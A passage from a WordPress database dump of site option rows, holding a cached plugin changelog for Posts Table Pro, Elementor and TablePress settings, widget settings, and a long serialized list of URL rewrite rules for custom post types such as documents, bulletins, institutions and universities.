WordPress content and lists it in an instant table with searching, sorting and filtering. List pages, posts, documents, audio, or any custom post type.<\\/p>\\n\",\"changelog\":\"<p>2.2.1<br \\/>\\nRelease date 23 September 2020<\\/p>\\n<ul>\\n<li>Fix: Add backwards compatibility for sites running PHP 5.6 (temporary).<\\/li>\\n<\\/ul>\\n<p>2.2<br \\/>\\nRelease date 9 September 2020<\\/p>\\n<ul>\\n<li>New: Added a \'date_modified\' column to display the post\'s last modified date.<\\/li>\\n<li>New: Added a \'button\' column which links to the single post page. A new \'button_text\' option is also available which allows you to set the text for the button.<\\/li>\\n<li>Added button text option and made other minor improvements to the settings page.<\\/li>\\n<li>Fix: A missing jQuery dependency was causing Javascript errors on some sites.<\\/li>\\n<li>Fix: The \'post_limit\' setting was incorrectly applied to lazy loaded tables. It now applies to lazy load only when explicitly set in the shortcode.<\\/li>\\n<li>Fix: Minor CSS issue with the + and - responsive row icons.<\\/li>\\n<li>Dev: Refactored code to use new architecture and plugin license system.<\\/li>\\n<li>Dev: Updated DataTables and Photoswipe libraries.<\\/li>\\n<li>Dev: Removed old web font formats which are no longer required.<\\/li>\\n<li>Dev: Added Composer support.<\\/li>\\n<\\/ul>\\n<p>https:\\/\\/barn2.co.uk\\/wordpress-plugins\\/posts-table-pro\\/changelog<\\/p>\\n\"},\"banners\":{\"high\":\"\",\"low\":\"\"},\"icons\":{\"1x\":\"https:\\/\\/barn2.co.uk\\/wp-content\\/uploads\\/edd\\/2016\\/10\\/ptp-main-image-128x128.jpg\",\"2x\":\"https:\\/\\/barn2.co.uk\\/wp-content\\/uploads\\/edd\\/2016\\/10\\/ptp-main-image-256x256.jpg\"},\"description\":[\"<p>This dynamic WordPress table plugin takes any type of WordPress content and lists it in an instant table with searching, sorting and filtering. List pages, posts, documents, audio, or any custom post type.<\\/p>\\n\"],\"changelog\":[\"<p>2.2.1<br \\/>\\nRelease date 23 September 2020<\\/p>\\n<ul>\\n<li>Fix: Add backwards compatibility for sites running PHP 5.6 (temporary).<\\/li>\\n<\\/ul>\\n<p>2.2<br \\/>\\nRelease date 9 September 2020<\\/p>\\n<ul>\\n<li>New: Added a \'date_modified\' column to display the post\'s last modified date.<\\/li>\\n<li>New: Added a \'button\' column which links to the single post page. A new \'button_text\' option is also available which allows you to set the text for the button.<\\/li>\\n<li>Added button text option and made other minor improvements to the settings page.<\\/li>\\n<li>Fix: A missing jQuery dependency was causing Javascript errors on some sites.<\\/li>\\n<li>Fix: The \'post_limit\' setting was incorrectly applied to lazy loaded tables. It now applies to lazy load only when explicitly set in the shortcode.<\\/li>\\n<li>Fix: Minor CSS issue with the + and - responsive row icons.<\\/li>\\n<li>Dev: Refactored code to use new architecture and plugin license system.<\\/li>\\n<li>Dev: Updated DataTables and Photoswipe libraries.<\\/li>\\n<li>Dev: Removed old web font formats which are no longer required.<\\/li>\\n<li>Dev: Added Composer support.<\\/li>\\n<\\/ul>\\n<p>https:\\/\\/barn2.co.uk\\/wordpress-plugins\\/posts-table-pro\\/changelog<\\/p>\\n\"]}\";}','no'),(4274,'elementor_clear_cache','','yes'),(4275,'elementor_reset_api_data','','yes'),(4277,'elementor_enable_inspector','','yes'),(4278,'elementor_replace_url','','yes'),(4279,'elementor_rollback','','yes'),(4280,'elementor_beta','no','yes'),(4281,'elementor_maintenance_mode_mode','','yes'),(4282,'elementor_maintenance_mode_exclude_mode','logged_in','yes'),(4283,'elementor_maintenance_mode_exclude_roles','a:0:{}','yes'),(4284,'elementor_maintenance_mode_template_id','1937','yes'),(4303,'tablepress_plugin_options','{\"plugin_options_db_version\":38,\"table_scheme_db_version\":3,\"prev_tablepress_version\":\"0\",\"tablepress_version\":\"1.9.2\",\"first_activation\":1573560772,\"message_plugin_update\":false,\"message_donation_nag\":true,\"use_custom_css\":true,\"use_custom_css_file\":true,\"custom_css\":\"\",\"custom_css_minified\":\"\",\"custom_css_version\":0}','yes'),(4434,'admin_email_lifespan','1781776353','yes'),(4435,'db_upgraded','','on'),(4475,'widget_widget_crp','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(4678,'cas_db_version','3.19.3','yes'),(4803,'elementor_library_category_children','a:0:{}','yes'),(4822,'widget_core_special_widgets_categories','a:3:{i:2;a:8:{s:5:\"title\";s:10:\"Categories\";s:1:\"f\";s:1:\"1\";s:2:\"ff\";s:1:\"0\";s:5:\"empty\";s:1:\"0\";s:4:\"icon\";s:1:\"1\";s:12:\"taxonomytype\";s:17:\"resource_category\";s:16:\"fontweightcustom\";s:6:\"normal\";s:14:\"fontsizecustom\";s:2:\"12\";}i:3;a:8:{s:5:\"title\";s:23:\"Institutions Categories\";s:1:\"f\";s:1:\"1\";s:2:\"ff\";s:1:\"0\";s:5:\"empty\";s:1:\"1\";s:4:\"icon\";s:1:\"1\";s:12:\"taxonomytype\";s:21:\"institutions_category\";s:16:\"fontweightcustom\";s:6:\"normal\";s:14:\"fontsizecustom\";s:2:\"12\";}s:12:\"_multiwidget\";i:1;}','yes'),(4892,'_bbp_super_sticky_topics','a:1:{i:0;i:1815;}','yes'),(4908,'rewrite_rules','a:272:{s:11:\"jsf/(.*)/?$\";s:25:\"index.php?jsf=$matches[1]\";s:19:\"(.?.+?)/jsf/(.*)/?$\";s:46:\"index.php?pagename=$matches[1]&jsf=$matches[2]\";s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:11:\"document/?$\";s:28:\"index.php?post_type=document\";s:28:\"document/page/([0-9]{1,})/?$\";s:46:\"index.php?post_type=document&paged=$matches[1]\";s:16:\"ekms-bulletin/?$\";s:33:\"index.php?post_type=ekms_bulletin\";s:33:\"ekms-bulletin/page/([0-9]{1,})/?$\";s:51:\"index.php?post_type=ekms_bulletin&paged=$matches[1]\";s:19:\"knowledge-broker/?$\";s:36:\"index.php?post_type=knowledge_broker\";s:36:\"knowledge-broker/page/([0-9]{1,})/?$\";s:54:\"index.php?post_type=knowledge_broker&paged=$matches[1]\";s:16:\"related-topic/?$\";s:33:\"index.php?post_type=related_topic\";s:33:\"related-topic/page/([0-9]{1,})/?$\";s:51:\"index.php?post_type=related_topic&paged=$matches[1]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:42:\"e-landing-page/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:52:\"e-landing-page/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:72:\"e-landing-page/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"e-landing-page/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"e-landing-page/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:48:\"e-landing-page/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:31:\"e-landing-page/([^/]+)/embed/?$\";s:47:\"index.php?e-landing-page=$matches[1]&embed=true\";s:35:\"e-landing-page/([^/]+)/trackback/?$\";s:41:\"index.php?e-landing-page=$matches[1]&tb=1\";s:43:\"e-landing-page/([^/]+)/page/?([0-9]{1,})/?$\";s:54:\"index.php?e-landing-page=$matches[1]&paged=$matches[2]\";s:50:\"e-landing-page/([^/]+)/comment-page-([0-9]{1,})/?$\";s:54:\"index.php?e-landing-page=$matches[1]&cpage=$matches[2]\";s:39:\"e-landing-page/([^/]+)(?:/([0-9]+))?/?$\";s:53:\"index.php?e-landing-page=$matches[1]&page=$matches[2]\";s:31:\"e-landing-page/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:41:\"e-landing-page/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:61:\"e-landing-page/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"e-landing-page/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"e-landing-page/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:37:\"e-landing-page/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:60:\"institutions-category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:60:\"index.php?institutions_category=$matches[1]&feed=$matches[2]\";s:55:\"institutions-category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:60:\"index.php?institutions_category=$matches[1]&feed=$matches[2]\";s:36:\"institutions-category/(.+?)/embed/?$\";s:54:\"index.php?institutions_category=$matches[1]&embed=true\";s:48:\"institutions-category/(.+?)/page/?([0-9]{1,})/?$\";s:61:\"index.php?institutions_category=$matches[1]&paged=$matches[2]\";s:30:\"institutions-category/(.+?)/?$\";s:43:\"index.php?institutions_category=$matches[1]\";s:56:\"resource-category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:56:\"index.php?resource_category=$matches[1]&feed=$matches[2]\";s:51:\"resource-category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:56:\"index.php?resource_category=$matches[1]&feed=$matches[2]\";s:32:\"resource-category/(.+?)/embed/?$\";s:50:\"index.php?resource_category=$matches[1]&embed=true\";s:44:\"resource-category/(.+?)/page/?([0-9]{1,})/?$\";s:57:\"index.php?resource_category=$matches[1]&paged=$matches[2]\";s:26:\"resource-category/(.+?)/?$\";s:39:\"index.php?resource_category=$matches[1]\";s:51:\"resource-tag/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?resource_tag=$matches[1]&feed=$matches[2]\";s:46:\"resource-tag/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?resource_tag=$matches[1]&feed=$matches[2]\";s:27:\"resource-tag/(.+?)/embed/?$\";s:45:\"index.php?resource_tag=$matches[1]&embed=true\";s:39:\"resource-tag/(.+?)/page/?([0-9]{1,})/?$\";s:52:\"index.php?resource_tag=$matches[1]&paged=$matches[2]\";s:21:\"resource-tag/(.+?)/?$\";s:34:\"index.php?resource_tag=$matches[1]\";s:52:\"resource-type/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?resource_type=$matches[1]&feed=$matches[2]\";s:47:\"resource-type/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?resource_type=$matches[1]&feed=$matches[2]\";s:28:\"resource-type/(.+?)/embed/?$\";s:46:\"index.php?resource_type=$matches[1]&embed=true\";s:40:\"resource-type/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?resource_type=$matches[1]&paged=$matches[2]\";s:22:\"resource-type/(.+?)/?$\";s:35:\"index.php?resource_type=$matches[1]\";s:34:\"document/.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:44:\"document/.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:64:\"document/.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"document/.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"document/.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:40:\"document/.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:23:\"document/(.+?)/embed/?$\";s:41:\"index.php?document=$matches[1]&embed=true\";s:27:\"document/(.+?)/trackback/?$\";s:35:\"index.php?document=$matches[1]&tb=1\";s:35:\"document/(.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?document=$matches[1]&paged=$matches[2]\";s:42:\"document/(.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?document=$matches[1]&cpage=$matches[2]\";s:31:\"document/(.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?document=$matches[1]&page=$matches[2]\";s:41:\"ekms-bulletin/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:51:\"ekms-bulletin/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:71:\"ekms-bulletin/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:66:\"ekms-bulletin/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:66:\"ekms-bulletin/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:47:\"ekms-bulletin/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:30:\"ekms-bulletin/([^/]+)/embed/?$\";s:46:\"index.php?ekms_bulletin=$matches[1]&embed=true\";s:34:\"ekms-bulletin/([^/]+)/trackback/?$\";s:40:\"index.php?ekms_bulletin=$matches[1]&tb=1\";s:42:\"ekms-bulletin/([^/]+)/page/?([0-9]{1,})/?$\";s:53:\"index.php?ekms_bulletin=$matches[1]&paged=$matches[2]\";s:49:\"ekms-bulletin/([^/]+)/comment-page-([0-9]{1,})/?$\";s:53:\"index.php?ekms_bulletin=$matches[1]&cpage=$matches[2]\";s:38:\"ekms-bulletin/([^/]+)(?:/([0-9]+))?/?$\";s:52:\"index.php?ekms_bulletin=$matches[1]&page=$matches[2]\";s:30:\"ekms-bulletin/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:40:\"ekms-bulletin/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:60:\"ekms-bulletin/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:55:\"ekms-bulletin/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:55:\"ekms-bulletin/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:36:\"ekms-bulletin/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:39:\"institution/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:49:\"institution/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:69:\"institution/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"institution/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"institution/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:45:\"institution/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:28:\"institution/([^/]+)/embed/?$\";s:44:\"index.php?institution=$matches[1]&embed=true\";s:32:\"institution/([^/]+)/trackback/?$\";s:38:\"index.php?institution=$matches[1]&tb=1\";s:40:\"institution/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?institution=$matches[1]&paged=$matches[2]\";s:47:\"institution/([^/]+)/comment-page-([0-9]{1,})/?$\";s:51:\"index.php?institution=$matches[1]&cpage=$matches[2]\";s:36:\"institution/([^/]+)(?:/([0-9]+))?/?$\";s:50:\"index.php?institution=$matches[1]&page=$matches[2]\";s:28:\"institution/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:38:\"institution/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:58:\"institution/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:53:\"institution/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:53:\"institution/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:34:\"institution/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:44:\"knowledge-broker/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:54:\"knowledge-broker/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:74:\"knowledge-broker/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"knowledge-broker/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"knowledge-broker/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:50:\"knowledge-broker/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:33:\"knowledge-broker/([^/]+)/embed/?$\";s:49:\"index.php?knowledge_broker=$matches[1]&embed=true\";s:37:\"knowledge-broker/([^/]+)/trackback/?$\";s:43:\"index.php?knowledge_broker=$matches[1]&tb=1\";s:45:\"knowledge-broker/([^/]+)/page/?([0-9]{1,})/?$\";s:56:\"index.php?knowledge_broker=$matches[1]&paged=$matches[2]\";s:52:\"knowledge-broker/([^/]+)/comment-page-([0-9]{1,})/?$\";s:56:\"index.php?knowledge_broker=$matches[1]&cpage=$matches[2]\";s:41:\"knowledge-broker/([^/]+)(?:/([0-9]+))?/?$\";s:55:\"index.php?knowledge_broker=$matches[1]&page=$matches[2]\";s:33:\"knowledge-broker/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:43:\"knowledge-broker/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:63:\"knowledge-broker/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"knowledge-broker/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"knowledge-broker/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:39:\"knowledge-broker/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:40:\"mea-resource/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:50:\"mea-resource/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:70:\"mea-resource/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"mea-resource/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"mea-resource/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:46:\"mea-resource/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:29:\"mea-resource/([^/]+)/embed/?$\";s:45:\"index.php?mea_resource=$matches[1]&embed=true\";s:33:\"mea-resource/([^/]+)/trackback/?$\";s:39:\"index.php?mea_resource=$matches[1]&tb=1\";s:41:\"mea-resource/([^/]+)/page/?([0-9]{1,})/?$\";s:52:\"index.php?mea_resource=$matches[1]&paged=$matches[2]\";s:48:\"mea-resource/([^/]+)/comment-page-([0-9]{1,})/?$\";s:52:\"index.php?mea_resource=$matches[1]&cpage=$matches[2]\";s:37:\"mea-resource/([^/]+)(?:/([0-9]+))?/?$\";s:51:\"index.php?mea_resource=$matches[1]&page=$matches[2]\";s:29:\"mea-resource/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:39:\"mea-resource/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:59:\"mea-resource/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"mea-resource/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"mea-resource/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:35:\"mea-resource/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:44:\"project-resource/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:54:\"project-resource/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:74:\"project-resource/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"project-resource/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"project-resource/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:50:\"project-resource/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:33:\"project-resource/([^/]+)/embed/?$\";s:49:\"index.php?project_resource=$matches[1]&embed=true\";s:37:\"project-resource/([^/]+)/trackback/?$\";s:43:\"index.php?project_resource=$matches[1]&tb=1\";s:45:\"project-resource/([^/]+)/page/?([0-9]{1,})/?$\";s:56:\"index.php?project_resource=$matches[1]&paged=$matches[2]\";s:52:\"project-resource/([^/]+)/comment-page-([0-9]{1,})/?$\";s:56:\"index.php?project_resource=$matches[1]&cpage=$matches[2]\";s:41:\"project-resource/([^/]+)(?:/([0-9]+))?/?$\";s:55:\"index.php?project_resource=$matches[1]&page=$matches[2]\";s:33:\"project-resource/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:43:\"project-resource/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:63:\"project-resource/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"project-resource/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"project-resource/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:39:\"project-resource/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:41:\"related-topic/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:51:\"related-topic/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:71:\"related-topic/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:66:\"related-topic/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:66:\"related-topic/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:47:\"related-topic/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:30:\"related-topic/([^/]+)/embed/?$\";s:46:\"index.php?related_topic=$matches[1]&embed=true\";s:34:\"related-topic/([^/]+)/trackback/?$\";s:40:\"index.php?related_topic=$matches[1]&tb=1\";s:42:\"related-topic/([^/]+)/page/?([0-9]{1,})/?$\";s:53:\"index.php?related_topic=$matches[1]&paged=$matches[2]\";s:49:\"related-topic/([^/]+)/comment-page-([0-9]{1,})/?$\";s:53:\"index.php?related_topic=$matches[1]&cpage=$matches[2]\";s:38:\"related-topic/([^/]+)(?:/([0-9]+))?/?$\";s:52:\"index.php?related_topic=$matches[1]&page=$matches[2]\";s:30:\"related-topic/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:40:\"related-topic/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:60:\"related-topic/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:55:\"related-topic/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:55:\"related-topic/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:36:\"related-topic/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:38:\"university/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:48:\"university/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:68:\"university/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:63:\"university/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:63:\"university/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:44:\"university/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:27:\"university/([^/]+)/embed/?$\";s:43:\"index.php?university=$matches[1]&embed=